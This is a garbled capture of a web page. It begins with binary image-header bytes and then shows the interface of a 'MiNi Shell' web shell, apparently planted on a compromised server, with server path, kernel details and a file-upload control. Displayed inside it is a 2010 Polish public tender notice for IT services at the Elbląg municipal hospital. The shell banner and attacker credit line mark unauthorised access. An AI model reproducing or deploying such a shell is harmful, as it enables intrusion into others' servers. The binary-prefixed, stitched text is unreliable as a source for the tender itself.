JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/104777-N-2010.html

<p class="kh_header"><b>Elbląg: świadczenie usług w zakresie administrowania istniejącą siecią informatyczną, oprogramowaniami oraz konserwacji i naprawy posiadanego sprzętu komputerowego wraz z urządzeniami peryferyjnymi dla Szpitala Miejskiego w Elblągu</b><br>
<b>Numer ogłoszenia: 104777 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Zakład Opieki Zdrowotnej Szpital Miejski im. Jana Pawła II w Elblągu , ul. Żeromskiego 22, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 230-41-97, faks 055 230-41-50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalmiejski.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług w zakresie administrowania istniejącą siecią informatyczną, oprogramowaniami oraz konserwacji i naprawy posiadanego sprzętu komputerowego wraz z urządzeniami peryferyjnymi dla Szpitala Miejskiego w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie administrowania istniejącą siecią informatyczną, oprogramowaniami oraz konserwacji i naprawy posiadanego sprzętu komputerowego wraz z urządzeniami peryferyjnymi dla Szpitala Miejskiego w Elblągu.
I. Szczegółowy zakres zamówienia:
1.	Administracja serwerem Linux (serwer bazy Oracle 9i):
- okresowa konserwacja serwera
- okresowa konserwacja systemu operacyjnego
2.	Administracja serwerem Linux (serwer Pacs- Ris oraz bazy Sybase):
- okresowa konserwacja serwera
- okresowa konserwacja systemu operacyjnego
3.	Administracja serwerem Linux (serwer WWW, e-mail)
- okresowa konserwacja serwera
- okresowa konserwacja systemu operacyjnego
- administracja kontami e-mail
4.	Administracja serwerem Windows (baza MS-SQL)
- okresowa konserwacja serwera
- administracja bazy MS-SQL
- okresowa konserwacja systemu operacyjnego
5.	Administracja serwera Novell
- okresowa konserwacja serwera
- kontrola / modyfikacja uprawnień użytkowników
- okresowa konserwacja systemu operacyjnego
6.	Sieć LAN:
- administrowanie i zarządzanie infrastrukturą
- przeprowadzanie okresowych przeglądów
- sporządzanie raportów dotyczących funkcjonowania infrastruktury technicznej
- wykonywanie prac instalacyjnych
- instalacja urządzeń sieciowych
- konfiguracja urządzeń
- konfiguracja połączeń
7.	Infrastruktura sprzętowa- zarządzanie i utrzymanie infrastruktury informatycznej wykorzystywanej przez użytkowników w tym:
- stacjami roboczymi
- drukarkami
- monitorami
- innymi urządzeniami peryferyjnymi
8.	Wsparcie w zakresie platformy systemowej i oprogramowania użytkowego:
- zarządzanie oraz utrzymanie systemów operacyjnych stacji roboczych, oprogramowania biurowego różnych producentów oraz aplikacji zainstalowanych na stacjach roboczych. W tym zakresie wymagane jest wykonywanie przeglądów oraz czynności konfiguracyjnych stacji roboczych, mające na celu utrzymanie stabilności, wydajności, wysokiej funkcjonalności oraz bezpieczeństwa systemów operacyjnych oprogramowania użytkowego.
- usługi serwisowe oraz doradcze oprogramowania Płatnik, Symfonia: Środki Trwałe Forte, Handel Forte, Finanse Księgowość Forte, Analizy finansowe, systemu kadrowo-płacowego Magic, systemu rozliczeń umów z NFZ KS- PPS, oprogramowanie do badań endoskopowych oraz ginekologicznych miniIRIS, oprogramowania opisowego rentgenowskich obrazów cyfrowych E-FILM, oprogramowania do badań densytometrycznych QDR, oprogramowania do dziennych testów klisz rentgenowskich Infosens 3, oprogramowania pracowni urodynamicznej pico3000 oraz innych użytkowanych przez Zamawiającego.
9.	Opracowanie Polityki kopii bezpieczeństwa i archiwizacji
10.	Czuwanie nad bezpieczeństwem systemów operacyjnych 
11.	Świadczenie konsultacji, pomocy i doradztwa związanego z eksploatacją systemów operacyjnych serwerów oraz stacji roboczych w godzinach urzędowania Zamawiającego
12.	Przeprowadzanie niezbędnych konserwacji i remontów elementów sieci informatycznej
13.	Utrzymanie stałego łącza należącego do Zamawiającego w stanie umożliwiającym korzystanie z usług dostępnych w sieci Internet
14.	Obsługa i zarządzanie oficjalną stroną internetową oraz kontami pocztowymi użytkowników
15.	Ścisła współpraca z firmą:
- UHC sp. z o. o. serwisującą system badań rentgenowskich NetRaad oraz progam GruperJGP 
- Siemens sp. z o. o. w zakresie serwisowania urządzeń rentgenowskich AristisFX oraz Mammomat 1000
- Sage sp. z o. o. w zakresie programu Symfonia
16.	Opieka nad elektronicznym systemem obsługi szpitala Eskulap
17.	Usuwanie awarii sieci informatycznej i sprzętu komputerowego
18.	Pomoc przy uzyskiwaniu danych niezbędnych do dokonywania analiz statystycznych
19.	Utrzymywanie wysokiego poziomu zabezpieczeń serwerów
20.	Utrzymywanie wysokiego poziomu zabezpieczeń sieci teleinformatycznej
21.	Sporządzanie sprawozdań z wykonania Zamówienia, z zastrzeżeniem, że Zamawiający będzie mógł żądać przedstawienia takiego sprawozdania nie częściej niż raz na miesiąc
22.	Przystępowanie do usuwania zgłoszonych awarii (tj. nieprzewidywalnych zdarzeń, innych niż siła wyższa, które uniemożliwiają korzystanie z sieci informatycznej) przy czym czas reakcji nie będzie mógł być dłuższy niż:
-   15 minut  w przypadku awarii, które wystąpiły w dni robocze /w godz. od 700 do 2000/
-   1 godz. w przypadku awarii, które wystąpiły w dni robocze /w godz. od 2000 do 700/

-   2 godz. w przypadku awarii, które wystąpiły w dniach ustawowo wolnych od pracy
23.	Informowanie wyczerpująco o przyczynie, skutkach i prawdopodobnym czasie trwania awarii oraz dołożenie wszelkich starań w celu zapewnienia alternatywnego sposobu korzystania z sieci informatycznej i jej zasobów
24.	Uprzedzanie o konieczności wejścia personelu do pomieszczeń Szpitala i wykonywanie prac zmierzające 
do usunięcia awarii w sposób możliwie najmniej uciążliwy dla działalności Szpitala
25.	Zawiadamianie z co najmniej siedmiodniowym wyprzedzeniem o planowanych przerwach lub zakłóceniach zwykłej działalności sieci informatycznej wynikających z konieczności dokonania konserwacji lub remontów
26.	W przypadku awarii sprzętu i konieczności wymiany elementów, dokonywanie oszacowania kosztów naprawy 
i uzyskania zgody na jej wykonanie
27.	Zapewnienie obecności jednego pracownika na terenie Szpitala w dni robocze od godz. 800 do godz. 1400 
( 6 godzin dziennie).
II. Zamawiający zobowiązuje się do:
1.	Udostępnienia fizycznych punktów dostępowych, infrastruktury fizycznej sieci komputerowej, serwerów, a także udostępnienia pomieszczeń, w których znajdują się te urządzenia
2.	Zapewnienia dostępu do telefonicznej sieci publicznej oraz Internetu przez łącza stałe znajdujące się w miejscu realizacji projektu
3.	Informowania o zamiarach wprowadzenia zmian organizacyjnych lub zmian w działalności jednostki, które mają lub mogą mieć wpływ na wykonanie usługi
4.	Zapewnienia personelowi możliwości wykonywania pracy w uzgodnionych godzinach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające udzielane będą w trybie zamówienia z wolnej ręki zgodnie z art. 67 ust.1 pkt.6 do wartości nie większej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.50.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający oceny spełniania tego warunku dokona na podstawie dokumentów określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający oceny spełniania tego warunku dokona na podstawie dokumentów określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający oceny spełniania tego warunku dokona na podstawie dokumentów określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający oceny spełniania tego warunku dokona na podstawie dokumentów określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający oceny spełniania tego warunku dokona na podstawie dokumentów określonych w części VI siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Wykaz wykonanych lub, w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług na rzecz jednostek ochrony zdrowia (co najmniej jednej) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie. Usługi muszą odpowiadać swoim rodzajem (zakresem wykonywanych prac) i wartością usłudze stanowiącej przedmiot zamówienia. W wykazie należy podać wartości brutto, daty wykonania i odbiorców. Do wykazu należy dołączyć dokumenty wystawione przez ich odbiorcę potwierdzające, że usługi te zostały wykonane (są wykonywane) należycie. Wzór wykazu stanowi załącznik Nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Żeromskiego 22 82-300 Elbląg, pok. 209, bud. administracyjny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 08:50, miejsce: ul. Żeromskiego 22 82-300 Elbląg, Sekretariat, bud. administracyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Data, godzina, miejsce otwarcia ofert: 10/05/2010, 09:00, sala konferencyjna nr 203 SPSZOZ Szpital Miejski im. Jana Pawła II. Koszt przygotowania (netto) drukowanej wersji SIWZ: 5 PLN, Zamawiający nie będzie zawierał umowy ramowej, Zamawiający nie będzie ustanawiał dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com